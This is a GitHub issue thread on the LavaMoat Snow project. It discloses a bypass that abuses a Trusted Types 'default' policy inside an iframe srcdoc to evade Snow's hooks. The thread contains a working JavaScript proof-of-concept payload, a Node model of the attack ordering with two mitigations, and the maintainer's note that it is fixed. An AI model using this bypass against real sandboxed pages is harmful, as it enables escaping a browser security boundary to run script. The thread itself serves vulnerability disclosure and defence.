LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass using trusted types default policy #90

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
  <iframe srcdoc="
    <meta http-equiv='Content-Security-Policy' content=&quot;require-trusted-types-for 'script';&quot;>. 
    <script>
      trustedTypes.createPolicy('default', { createHTML: s=>s, createScript: function (s) { return ''; } });
      setTimeout(()=>frames[0].alert(1),100);
    </script>
  <iframe src=\'javascript:alert(1)\'</iframe>"></iframe>
`

The idea was to take advantage of the trusted types default policy to break the "atomicity" of the hooks (i.e., the malicious policy will get called after the hooks, but before the actual HTML/script assignment). There are several different directions; here I just use createScript to break the internal SNOW_WINDOW(this) in the javascript: URI :)
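The ordering described above (hook, then default policy, then the actual sink) as an added Node model. This is not Snow's code and not the browser's Trusted Types implementation: `createPolicy`, `nativeInnerHtml`, `hookedInnerHtml` and the `allowDefault` option are stand-ins written for this illustration, with `allowDefault` modelling a CSP `trusted-types` allow-list that omits the `default` name. It runs the bypass ordering for the `createHTML` path (the PoC uses `createScript`, which the browser consults the same way) and then two defender-side checks: refusing a default policy outright, and inspecting the default policy's output rather than only the string the hook saw.

```javascript
// Added illustration, not Snow's own code: a Node model of the Trusted Types
// pipeline for a protected DOM sink (innerHTML) under
// `require-trusted-types-for 'script'`. Browser objects (trustedTypes,
// Element.prototype.innerHTML) are stood in for by plain functions so the
// ordering hook -> default policy -> sink can be run and asserted offline.

const sink = { committed: null };               // stands in for the live DOM
function commitHtml(html) { sink.committed = html; }

// Policy registry model. As in the browser, a policy named "default" is
// consulted for every plain string handed to a protected sink.
const policies = new Map();
function createPolicy(name, rules, { allowDefault = true } = {}) {
  // Hypothetical option modelling a CSP `trusted-types` allow-list that
  // does not include "default": the browser then refuses to create it.
  if (name === 'default' && !allowDefault) {
    throw new TypeError('policy "default" not allowed by trusted-types directive');
  }
  if (policies.has(name)) throw new TypeError(`policy "${name}" already exists`);
  policies.set(name, rules);
  return rules;
}
function resetPolicies() { policies.clear(); sink.committed = null; }

// The native setter: applies the default policy (if any) *after* any JS
// wrapper has already run, then commits the result.
function nativeInnerHtml(value) {
  const def = policies.get('default');
  const html = def && def.createHTML
    ? def.createHTML(String(value), 'Element', 'innerHTML')
    : String(value);
  commitHtml(html);
}

// A Snow-style wrapper around the setter: inspect the string, then delegate.
const looksDangerous = html => /<iframe/i.test(html);
function hookedInnerHtml(value) {
  const seen = String(value);
  if (looksDangerous(seen)) throw new Error('hook blocked: ' + seen);
  nativeInnerHtml(seen);
  return seen;
}

// 1. The problem: the default policy rewrites the string between the hook's
//    inspection and the commit, so what lands differs from what was checked.
function bypassScenario() {
  resetPolicies();
  createPolicy('default', { createHTML: s => s.replace('<b>', '<iframe>') });
  const seen = hookedInnerHtml('<b>hi</b>');
  return { seen, committed: sink.committed };
}

// 2. Mitigation A: forbid a default policy via the trusted-types allow-list;
//    the hook's view and the committed value then coincide.
function cspScenario() {
  resetPolicies();
  let refused = false;
  try {
    createPolicy('default', { createHTML: s => s.replace('<b>', '<iframe>') },
                 { allowDefault: false });
  } catch (e) { refused = true; }
  const seen = hookedInnerHtml('<b>hi</b>');
  return { refused, seen, committed: sink.committed };
}

// 3. Mitigation B: wrap policy creation so the inspection also runs on the
//    default policy's *output*, i.e. on the value the sink will actually get.
function guardedCreatePolicy(name, rules, options) {
  if (name !== 'default' || typeof rules.createHTML !== 'function') {
    return createPolicy(name, rules, options);
  }
  const inner = rules.createHTML;
  const guarded = {
    ...rules,
    createHTML: (s, ...rest) => {
      const out = inner(s, ...rest);
      if (looksDangerous(out)) throw new Error('default policy output blocked: ' + out);
      return out;
    },
  };
  return createPolicy(name, guarded, options);
}
function guardedScenario() {
  resetPolicies();
  guardedCreatePolicy('default', { createHTML: s => s.replace('<b>', '<iframe>') });
  let blocked = false;
  try { hookedInnerHtml('<b>hi</b>'); } catch (e) { blocked = true; }
  return { blocked, committed: sink.committed };
}
```

In a real page, mitigation A is the `Content-Security-Policy: trusted-types <names>` directive with `default` left off the list, and mitigation B corresponds to wrapping `trustedTypes.createPolicy` so that a default policy's callbacks are inspected on their return values; a hook on the sink setter alone can never see the post-policy string, which is the point of the bypass.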

weizman commented 1 year ago

Think I'm gonna remove srcdoc CSP attempts altogether (read further @ #104)

weizman commented 1 year ago

fixed by #104